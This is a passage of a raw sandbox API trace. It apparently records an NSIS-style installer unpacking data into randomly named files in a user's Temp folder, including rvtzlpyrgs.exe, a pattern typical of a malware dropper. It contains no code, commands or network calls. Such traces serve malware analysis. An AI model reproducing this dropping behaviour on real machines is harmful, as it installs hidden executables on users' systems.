"c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0056.887] GetLastError () returned 0xb7 [0056.887] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0056.887] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg75b2.tmp"), lpSecurityAttributes=0x0) returned 1 [0056.888] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.888] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0056.888] lstrcpynA (in: lpString1=0x409c50, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.888] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned 48 [0056.888] lstrcpynA (in: lpString1=0x42b800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg75B2.tmp" [0056.888] lstrcpynA (in: lpString1=0x425000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0056.888] lstrcpynA (in: lpString1=0x422f20, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.888] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.888] lstrcpynA (in: lpString1=0x40a050, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.889] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0056.889] GetLastError () returned 0xb7 [0056.889] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0056.889] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0056.889] GetLastError () returned 0xb7 [0056.889] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0056.890] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0056.890] GetLastError () returned 0xb7 [0056.890] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0056.890] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0056.890] GetLastError () returned 0xb7 [0056.890] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0056.890] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0056.890] GetLastError () returned 0xb7 [0056.890] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0056.890] lstrcpynA (in: lpString1=0x42a800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.890] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0056.891] lstrcpynA (in: lpString1=0x40a850, lpString2="aqqlknbytl.sm", iMaxLength=1024 | out: lpString1="aqqlknbytl.sm") returned="aqqlknbytl.sm" [0056.891] lstrcpynA (in: lpString1=0x409c50, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.891] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.891] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.891] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="aqqlknbytl.sm" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm" [0056.891] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\aqqlknbytl.sm")) returned 0xffffffff [0056.891] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\aqqlknbytl.sm" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\aqqlknbytl.sm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0056.892] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=8504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2138 [0056.892] GetTickCount () returned 0x18a75c0 [0056.892] ReadFile (in: hFile=0x1dc, lpBuffer=0x19fbf0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x19fbf0*, lpNumberOfBytesRead=0x19fbe4*=0x4, lpOverlapped=0x0) returned 1 [0056.892] GetTickCount () returned 0x18a75c0 [0056.892] SetFilePointer (in: hFile=0x200, lDistanceToMove=50204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xc41c [0056.892] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=24037, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5de5 [0056.892] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.892] GetTickCount () returned 0x18a75c0 [0056.894] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x423b, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x423b, lpOverlapped=0x0) returned 1 [0056.895] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.895] GetTickCount () returned 0x18a75c0 [0056.897] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x49af, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x49af, lpOverlapped=0x0) returned 1 [0056.898] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.898] GetTickCount () returned 0x18a75c0 [0056.900] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x4795, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x4795, lpOverlapped=0x0) returned 1 [0056.901] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.901] GetTickCount () returned 0x18a75c0 [0056.903] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x5ada, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x5ada, lpOverlapped=0x0) returned 1 [0056.904] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.904] GetTickCount () returned 0x18a75c0 [0056.907] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.908] GetTickCount () returned 0x18a75cf [0056.909] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x250e, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x250e, lpOverlapped=0x0) returned 1 [0056.909] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=8508, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x213c [0056.909] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.909] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.915] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.915] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.916] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.916] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.916] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.916] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.917] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.917] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.917] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x4000, lpOverlapped=0x0) returned 1 [0056.917] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x4000, lpOverlapped=0x0) returned 1 [0056.918] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x2000, lpOverlapped=0x0) returned 1 [0056.918] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x2000, lpOverlapped=0x0) returned 1 [0056.918] SetFileTime (hFile=0x28, lpCreationTime=0x19fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x19fd8c) returned 1 [0056.918] CloseHandle (hObject=0x28) returned 1 [0056.923] lstrcpynA (in: lpString1=0x40a850, lpString2="xdnyr.wb", iMaxLength=1024 | out: lpString1="xdnyr.wb") returned="xdnyr.wb" [0056.923] lstrcpynA (in: lpString1=0x409c50, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.923] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.923] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.923] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="xdnyr.wb" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" [0056.923] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xdnyr.wb")) returned 0xffffffff [0056.923] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\xdnyr.wb" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\xdnyr.wb"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0056.923] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=115004, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1c13c [0056.924] GetTickCount () returned 0x18a75df [0056.924] ReadFile (in: hFile=0x1dc, lpBuffer=0x19fbf0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x19fbf0*, lpNumberOfBytesRead=0x19fbe4*=0x4, lpOverlapped=0x0) returned 1 [0056.924] GetTickCount () returned 0x18a75df [0056.924] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x1562, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbe4*=0x1562, lpOverlapped=0x0) returned 1 [0056.924] WriteFile (in: hFile=0x28, lpBuffer=0x413120*, nNumberOfBytesToWrite=0x1562, lpNumberOfBytesWritten=0x19fbfc, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesWritten=0x19fbfc*=0x1562, lpOverlapped=0x0) returned 1 [0056.925] SetFileTime (hFile=0x28, lpCreationTime=0x19fd8c, lpLastAccessTime=0x0, lpLastWriteTime=0x19fd8c) returned 1 [0056.925] CloseHandle (hObject=0x28) returned 1 [0056.926] lstrcpynA (in: lpString1=0x40a850, lpString2="rvtzlpyrgs.exe", iMaxLength=1024 | out: lpString1="rvtzlpyrgs.exe") returned="rvtzlpyrgs.exe" [0056.926] lstrcpynA (in: lpString1=0x409c50, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0056.926] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.926] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.926] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="rvtzlpyrgs.exe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" [0056.926] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe")) returned 0xffffffff [0056.927] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0056.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=120482, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d6a2 [0056.928] GetTickCount () returned 0x18a75df [0056.928] ReadFile (in: hFile=0x1dc, lpBuffer=0x19fbf0, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x19fbf0*, lpNumberOfBytesRead=0x19fbe4*=0x4, lpOverlapped=0x0) returned 1 [0056.928] GetTickCount () returned 0x18a75df [0056.928] SetFilePointer (in: hFile=0x200, lDistanceToMove=132124, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2041c [0056.928] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=143692, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2314c [0056.928] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.928] GetTickCount () returned 0x18a75df [0056.932] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.933] GetTickCount () returned 0x18a75df [0056.933] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x150, lpOverlapped=0x0) returned 1 [0056.933] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.933] GetTickCount () returned 0x18a75df [0056.935] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.936] GetTickCount () returned 0x18a75ef [0056.938] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.938] GetTickCount () returned 0x18a75ef [0056.939] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x37e, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x37e, lpOverlapped=0x0) returned 1 [0056.939] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.939] GetTickCount () returned 0x18a75ef [0056.941] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.942] GetTickCount () returned 0x18a75ef [0056.944] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x49f7, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x49f7, lpOverlapped=0x0) returned 1 [0056.944] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.945] GetTickCount () returned 0x18a75ef [0056.947] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0056.948] GetTickCount () returned 0x18a75ef [0056.948] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x7ba, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x7ba, lpOverlapped=0x0) returned 1 [0056.949] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0056.949] GetTickCount () returned 0x18a75ef [0056.951] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0057.010] GetTickCount () returned 0x18a762d [0057.010] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x16e2, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x16e2, lpOverlapped=0x0) returned 1 [0057.011] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x4000, lpOverlapped=0x0) returned 1 [0057.011] GetTickCount () returned 0x18a762d [0057.013] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0057.015] GetTickCount () returned 0x18a763d [0057.016] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x3481, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x3481, lpOverlapped=0x0) returned 1 [0057.016] ReadFile (in: hFile=0x200, lpBuffer=0x413120, nNumberOfBytesToRead=0x2d8e, lpNumberOfBytesRead=0x19fbb4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, lpNumberOfBytesRead=0x19fbb4*=0x2d8e, lpOverlapped=0x0) returned 1 [0057.016] GetTickCount () returned 0x18a763d [0057.019] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x8000, lpOverlapped=0x0) returned 1 [0057.020] GetTickCount () returned 0x18a763d [0057.020] WriteFile (in: hFile=0x1dc, lpBuffer=0x40b120*, nNumberOfBytesToWrite=0x578, lpNumberOfBytesWritten=0x19fbc8, lpOverlapped=0x0 | out: lpBuffer=0x40b120*, lpNumberOfBytesWritten=0x19fbc8*=0x578, lpOverlapped=0x0) returned 1 [0057.020] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=120486, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d6a6 [0057.020] ReadFile (in: hFile=0x1dc, lpBuffer=0x413120, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19fbe4, lpOverlapped=0x0 | out: lpBuffer=0x413120*, 